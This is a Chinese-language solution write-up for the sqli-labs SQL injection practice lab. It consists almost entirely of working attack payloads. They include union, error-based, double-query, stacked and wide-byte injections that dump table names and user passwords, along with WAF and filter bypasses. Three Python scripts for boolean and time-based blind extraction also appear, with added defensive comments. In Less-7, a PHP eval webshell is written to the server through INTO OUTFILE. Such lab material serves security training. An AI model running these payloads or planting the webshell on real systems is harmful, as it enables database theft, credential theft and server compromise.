之前的一些关于 sqli-labs 的练习

Less-1(单引号 union 注入)

?id=' union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=' union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=' union select 1,2,group_concat(password) from users--+

Less-2(无引号 union 注入)

?id=0 union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=0 union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=0 union select 1,2,group_concat(password) from users--+

Less-3(单引号括号 union 注入)

?id=') union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=') union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=') union select 1,2,group_concat(password) from users--+

Less-4(双引号 union 注入)

?id=") union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=") union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=") union select 1,2,group_concat(password) from users--+

Less-5(单引号双注入)

?id=1' union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select password from users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-6(双引号双注入)

?id=1" union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select password from users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-7(一句话木🐎)

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

?id=1')) union select 1,2,'<?php @eval($_POST["123"]); ?>' into outfile 'E:\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\test.php'--+

上菜刀

Less-8(单引号布尔盲注)

import requests
import string

# Boolean-based blind SQL injection probe for the local sqli-labs "Less-8" page.
# The page leaks exactly one bit per request -- whether the text "You are in"
# is rendered -- so the script asks a series of yes/no questions through the
# `id` parameter. Defensive takeaways: the server-side fix is a parameterized
# query (the oracle disappears); on the detection side, a burst of requests to
# one URL whose `id` value carries `length(`, `ASCII(mid(` or
# `information_schema` is the signature to alert on.
url = "http://localhost:8088/sqli-labs-master/Less-8/"  # deliberately vulnerable lab on localhost
length = 0  # filled in by getLength(); getPayload() loops over positions 1..length

# Author's notes: a no-op string literal (not a module docstring) whose Chinese
# heading reads "blind injection results" -- the names recovered from the lab
# database when the script was run.
'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
    """Learn how long the target string is via the page's true/false oracle.

    One GET per candidate length in 2..10; the first response containing
    "You are in" wins and is stored in the module-level ``length`` for
    getPayload(). If no candidate matches, ``length`` stays 0 and
    getPayload() recovers nothing. Only the last ``payload`` assignment is
    active; the commented ones are the earlier targets the author probed
    (database name, table name, column name).
    """
    global length
    for i in range(2,11):
        #payload = "' or length(database())=" + str(i) + "#"
        #payload = "' or length((select table_name from information_schema.tables where table_schema=database() limit 4,1))=" + str(i) + "#"
        #payload = "' or length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
        payload = "' or length((select password from users limit 0,1))=" + str(i) + "#"
        data = {
            'id':payload
        }
        r = requests.get(url,params=data)
        # The oracle: the lab renders "You are in" only when the injected
        # condition is true.
        if "You are in" in r.text:
            length = i
            print("【+】 right length: " + str(i))
            break
        else:
            pass
            # NOTE(review): the paste lost its indentation; this print is placed
            # in the else branch to match the Less-15 script -- confirm against
            # the original.
            print("【*】 wrong length: " + str(i))

def getPayload():
    """Recover the target string one character at a time by binary search.

    For each position 1..``length`` the script asks whether the ASCII code of
    that character is greater than ``mid`` and narrows [left, right] until one
    code remains. The search space is 'a'..'z' (97..122), so any character
    below 'a' (digits, uppercase) is reported as 'a'. Each character costs
    about five requests. Uses the module-level ``url`` and ``length`` set by
    getLength().
    """
    password = ""
    for i in range(1,length+1):
        left = ord('a')
        right = ord('z')
        # Invariant: the answer lies in [left, right]; the loop ends when they meet.
        while left != right:
            mid = int((left + right) / 2)
            #payload = "' or ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
            payload = "' or ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
            data = {
                'id':payload
            }
            r = requests.get(url,params=data)
            # "You are in" means ASCII(char) > mid, so the answer is above mid.
            if "You are in" in r.text:
                left = mid + 1
                print(str(i) + " > " + chr(mid))
            else:
                right = mid
                print(str(i) + " <= " + chr(mid))
        password += chr(left)
    # NOTE(review): indentation was lost in the paste; the final print is
    # placed after the loop (one summary line) -- confirm against the original.
    print("【+】 password: " + password)

if __name__ == "__main__":
    # Two phases: first learn how many characters to recover, then recover them.
    getLength()
    getPayload()

Less-9(单引号时间盲注)

import requests
import string

# Time-based blind SQL injection probe for the local sqli-labs "Less-9" page.
# This page renders the same content whether the injected condition is true
# or false, so the script uses response time as the side channel: the payload
# calls sleep(4) when the condition holds and the request timeout is 3 s, so a
# ReadTimeout means "true". Defensive takeaways: a parameterized query removes
# the channel; on the detection side, `sleep(` / `if(` inside a query
# parameter and a run of requests that each take ~4 s server-side are the
# signals to alert on.
url = "http://localhost:8088/sqli-labs-master/Less-9/"  # deliberately vulnerable lab on localhost
length = 0  # filled in by getLength(); getPayload() loops over positions 1..length
letters = string.ascii_letters # all 52 ASCII letters, both cases (ascii_letters is not lowercase-only)

# Author's notes: a no-op string literal (not a module docstring) whose Chinese
# heading reads "blind injection results" -- the names recovered from the lab
# database when the script was run.
'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
    """Learn the length of the target string via the timing oracle.

    One GET per candidate length in 2..10 with a 3 s timeout; the payload
    sleeps 4 s when the length matches, so the first ReadTimeout fixes the
    module-level ``length`` for getPayload(). A slow server or network can
    therefore produce a false "match"; exceptions other than ReadTimeout
    (e.g. connection errors) are not caught and end the script. If no
    candidate matches, ``length`` stays 0. Only the last ``payload``
    assignment is active; the commented ones are earlier targets.
    """
    global length
    for i in range(2,11):
        #payload = "' or if(length(database())=" + str(i) + ",sleep(4),1)#"
        #payload = "' or if(length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + ",sleep(4),1)#"
        #payload = "' or if(length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + ",sleep(4),1)#"
        payload = "' or if(length((select password from users limit 0,1))=" + str(i) + ",sleep(4),1)#"
        data = {
            'id':payload
        }
        try:
            r = requests.get(url,params=data,timeout=3)
            print("【*】 present length: " + str(i))
        except requests.exceptions.ReadTimeout as e:
            # A timeout means the condition was true: the server slept past the 3 s limit.
            length = i
            print("【+】 right length: " + str(i))
            break

def getPayload():
    """Recover the target string one character at a time via the timing oracle.

    For each position 1..``length`` the script tries every character in
    ``letters`` in turn (linear search, up to 52 requests per position); a
    ReadTimeout means the guess matched and the character is appended. If
    the real character is not an ASCII letter, no request times out, nothing
    is appended, and that position is silently skipped. The triple-quoted
    block at the top of the loop body is an inactive (string-literal)
    remnant of the binary-search variant. Uses the module-level ``url``,
    ``length`` and ``letters``.
    """
    password = ""
    for i in range(1,length+1):
        '''
left = ord('a')
right = ord('z')
while left != right:
mid = int((left + right) / 2)
payload = "' or if(ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + ",1,sleep(4))#"
#payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select password from users limit 1,1)," + str(i) + ",1))>" + str(mid) + "#"
data = {
'id':payload
}
try:
r = requests.get(url,params=data,timeout=3)
left = mid + 1
print(str(i) + " > " + chr(mid))
except requests.exceptions.ReadTimeout as e:
right = mid
print(str(i) + " <= " + chr(mid))

password += chr(left)
print("【+】 password: " + password)
'''
        for j in letters:
            #payload = "' or if(ASCII(mid(database()," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            #payload = "' or if(ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            #payload = "' or if(ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            payload = "' or if(ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
            data = {
                'id':payload
            }
            try:
                r = requests.get(url,params=data,timeout=3)
                print("【*】 present password: " + str(i) + " = " + j)
            except requests.exceptions.ReadTimeout as e:
                # Timeout == this guess matched; move on to the next position.
                password += j
                print("【+】 password: " + password)
                break

if __name__ == "__main__":
    # Two phases: first learn how many characters to recover, then recover them.
    getLength()
    getPayload()

Less-10(双引号时间盲注)

Less-9 单引号改双引号

Less-11(用户名加密的单引号 union 注入)

uname = admin'#

' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

' union select 1,group_concat(password) from users#

Less-12(用户名加密的双引号括号 union 注入)

uname = admin")#

less-11 单引号改双引号括号

Less-13(用户名的单引号括号双注入)

admin') union select count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select password from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

Less-14(用户名的双引号双注入)

less-13 单引号括号改双引号

Less-15(用户名的单引号布尔注入)

import requests
import string

# Boolean-based blind SQL injection probe for the local sqli-labs "Less-15"
# login form. Both form fields are POSTed; the injected condition rides in
# `uname` and the one bit the page leaks is whether the markup references
# "flag.jpg" (successful login) or not. Defensive takeaways: a parameterized
# login query removes the oracle; on the detection side, many POSTs to one
# login endpoint with a fixed password and a `uname` value containing
# `length(` / `ASCII(mid(` is the pattern to alert on.
url = "http://localhost:8088/sqli-labs-master/Less-15/"  # deliberately vulnerable lab on localhost
length = 0  # filled in by getLength(); getPayload() loops over positions 1..length

# Author's notes: a no-op string literal (not a module docstring) whose Chinese
# heading reads "blind injection results" -- the names recovered from the lab
# database when the script was run.
'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
    """Learn how long the target string is via the login page's oracle.

    One POST per candidate length in 2..10; the first response containing
    "flag.jpg" wins and is stored in the module-level ``length`` for
    getPayload(). If no candidate matches, ``length`` stays 0 and
    getPayload() recovers nothing. Only the last ``payload`` assignment is
    active; the commented ones are earlier targets the author probed.
    """
    global length
    for i in range(2,11):
        #payload = "admin' and length(database())=" + str(i) + "#"
        #payload = "admin' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + "#"
        #payload = "admin' and length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
        payload = "admin' and length((select password from users limit 0,1))=" + str(i) + "#"
        data = {
            'uname':payload,
            'passwd':123
        }
        r = requests.post(url,data=data)
        # The oracle: the lab shows "flag.jpg" only when the login query
        # (and hence the injected condition) succeeds.
        if "flag.jpg" in r.text:
            length = i
            print("【+】 right length: " + str(i))
            print("--------------------------------------------")
            break
        else:
            print("【*】 wrong length: " + str(i))

def getPayload():
    """Recover the target string one character at a time by binary search.

    For each position 1..``length`` the script asks whether the ASCII code of
    that character is greater than ``mid`` and narrows [left, right] until one
    code remains. The search space is 'A'..'z' (65..122, which also covers
    the punctuation between 'Z' and 'a'), so any character below 'A'
    (digits) is reported as 'A'. Each character costs about six requests.
    Uses the module-level ``url`` and ``length`` set by getLength().
    """
    password = ""
    for i in range(1,length+1):
        left = ord('A')
        right = ord('z')
        # Invariant: the answer lies in [left, right]; the loop ends when they meet.
        while left != right:
            mid = int((left + right) / 2)
            #payload = "admin' and ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "admin' and ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))>" + str(mid) + "#"
            #payload = "admin' and ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
            payload = "admin' and ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
            data = {
                'uname':payload,
                'passwd':123
            }
            r = requests.post(url,data=data)
            # "flag.jpg" means ASCII(char) > mid, so the answer is above mid.
            if "flag.jpg" in r.text:
                left = mid + 1
                print(str(i) + " > " + chr(mid))
            else:
                right = mid
                print(str(i) + " <= " + chr(mid))
        password += chr(left)
    # NOTE(review): indentation was lost in the paste; the final print is
    # placed after the loop (one summary line) -- confirm against the original.
    print("【+】 password: " + password)

if __name__ == "__main__":
    # Two phases: first learn how many characters to recover, then recover them.
    getLength()
    getPayload()

Less-16(用户名的双引号括号布尔注入)


Less-17(用户名加密的单引号报错注入)


Less-18(User-Agent 报错注入)

User-Agent: ' or updatexml(1,concat('~',(select table_name from information_schema where table_schema=database),'~'),1) or

Less-19(Referer 报错注入)


Less-20(User-Agent 报错注入)

上 burpsuite 修改 Cookie:

Cookie: uname=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

Cookie: uname=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

Cookie: uname=' union select 1,2,group_concat(password) from users#

Less-21(User-Agent 加密报错注入)

less-20 单引号改单引号括号再用 base64 加密

Less-22(User-Agent 加密报错注入)

less-20 单引号改双引号再用 base64 加密

Less-23 (过滤注释)

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' and '1

?id=' union select 1,2,group_concat(password) from users where ''='

Less-24 (二次排序漏洞)

先注册一个 admin'# 账号再修改 admin'# 的密码,新密码即为 admin 的密码。

Less-25 (过滤 or & and)

一次性关键词绕过 用 oorr 和 aandnd 绕过

?id=' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

?id=' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name='users'--+

?id=' union select 1,2,group_concat(passwoorrd) from users--+

Less-25a(过滤 or & and )

表面上是盲注,背地里是 less-25 无引号的 union 注入...

Less-26 (过滤空格和注释的报错注入)

本题全部空格都过滤了,所以采取报错注入
or 用 || 代替,and 用 %26%26 代替(&&也过滤了)
注释则用 ||'1 闭合

?id='||updatexml(1,concat('~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())%26%26(table_name='user')),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(passwoorrd))from(users)),'~'),1)||'1

Less-26a(过滤空格和注释的布尔注入)

空格全部被过滤,此题又不能进行报错注入,所以采取布尔注入

Less-27 (过滤 nion 和 select 的 union 注入)

union 注入:
通过脚本可知空格可以用 %09、%0a-%0d 绕过
非一次性关键词绕过,union 和 select 用大小写 unioN 和 selecT 绕过

?id='%0AunioN%0AselecT%0A1,2,group_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema=database()%0Aand%0Atable_name='users'%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ausers%0Awhere%0A'1
或者
?id='%0AunioN%0AselecT%0A1,(selecT%0Agroup_concat(password)%0Afrom%0Ausers),3%0A||'

报错注入:
其他与 less-26 类似

?id='||updatexml(1,concat('~',(selecT(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(column_name))from(information_schema.columns)where(table_schema=database())%26%26(table_name='users')),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(password))from(users)),'~'),1)||'1

Less-27a(过滤 nion 和 select 的时间盲注)

双引号 + 时间盲注
其他同 less-27

Less-28(过滤 nion 和 select 的 union 注入)

有个小bug,网上的 payload 都是 union 注入,但是我的空格不能用 %a0 绕过...所以只好用布尔盲注

?id=1')and(ascii(mid(database(),1,1))=115)and('1')=('1

Less-28a(过滤 union 和 select 的布尔注入)

同 less-28

Less-29(WAF1)

这题是???签到题???

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=' union select 1,group_concat(password),3 from users--+

Less-30(WAF2)

less-29 单引号改双引号

Less-31(WAF3)

less-29 单引号改双引号括号

Less-32(宽字节注入)

基于 get 方法的宽字节注入,加 %df 绕过

?id=%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=%df' union select 1,group_concat(password),3 from users--+

Less-33(宽字节注入)

同 less-32

Less-34(用户名和密码加反斜杠)

基于 post 的宽字节注入,又可以将 utf-8 转换为 utf-16 或 utf-32,例如将'转为 utf-16 为 %EF%BF%BD'/�'

万能密码 �' or 1# 不知道为什么我的电脑只有这个能用

admin=�' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

admin=�' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

admin=�' union select 1,group_concat(password) from users#

Less-35(加反斜杠没引号的 union 注入)

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=0 union select 1,group_concat(password),3 from users--+

Less-36(基于 get 的 mysql_real_escape_string() 函数的 union 注入)

同 less-32

Less-37(基于 post 的 mysql_real_escape_string() 函数的 union 注入)

同 less-34

Less-38(堆叠注入)

stacked injection:在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。所以我们可以利用分号进行多句输入。

?id=1';insert into users(id,username,password) values(15,'less38','less38') -- +

Less-39(堆叠注入)

?id=1;insert into users(id,username,password) values(16,'less39','less39') -- +

Less-40(堆叠注入)

?id=1');insert into users(id,username,password) values(17,'less40','less40') -- +

Less-41(堆叠注入)

同 less-39 区别于无报错信息

Less-42(堆叠注入)

用户名做了转义处理,可以对密码进行堆叠注入

login_user=1&login_password=1';create table less42 like users#

Less-43(堆叠注入)

类似 less-42,只是多了个括号

login_user=1&login_password=1');create table less43 like users#

Less-44(堆叠注入)

同 less-42 只是没有报错信息

Less-45(堆叠注入)

同 less-43 只是没有报错信息

Less-46(order by 注入)

此题可考虑报错注入和延时注入:
1. 直接添加注入语句,?sort=(select ******);
2. 利用一些函数。例如rand()函数等。?sort=rand(sql语句),对比rand(true)和rand(false)的结果,可以判断是否注入成功;
3. 利用and,例如?sort=1 and (加sql语句)。

报错注入:

?sort=1 and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(password) from users),'~'))--+

延时注入例子 :

http://127.0.0.1/sqli-labs-master/Less-46/?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))

Less-47 (order by 注入)

类似 less-46 只是多了一个单引号

Less-48(order by 盲注)

类似 less-46 无报错信息,所以需要盲注
如:
?sort=1 and if(length(database())=8,sleep(4),1)--+
?sort=1 and if(ascii(left(database(),1))=115,sleep(4),1)--+

Less-49(order by 盲注)

类似 less-48 多了一个单引号

Less-50(order by 堆叠注入)

这题使用 mysqli_multi_query 函数,所以可以执行多个语句。

?sort=1;create table less50 like users -- +
/?sort=1;insert into users(id,username,password)value(18,'less50','less50')#

Less-51(order by 堆叠注入)

类似 less-50 多了一个单引号

Less-52(order by 堆叠注入)

同 less-50 没有了注释

Less-53(order by 堆叠注入)

同 less-51 没有了注释

Less-54(挑战1)

依旧是字符型注入,只不过只有十次机会,密码就在 secret 列名里面

Less-55(挑战2)

类似 less-54 加了一个括号

Less-56(挑战3)

类似 less-54 加了一个单引号括号

Less-57(挑战4)

类似 less-54 加了一个双引号

Less-58(挑战5)

union 注入失败,但是可以进行报错注入,这次是单引号型的

Less-59(挑战6)

类似 less-58 这次是纯数字型

Less-60(挑战7)

类似 less-58 这次是双引号括号型的

Less-61(挑战8)

类似 less-58 这次真的猜不出...原来是单引号加两层括号...

Less-62(挑战9)

单引号括号型,但是 union 注入和报错注入已经失效,页面信息也没有变化
所以只能进行时间盲注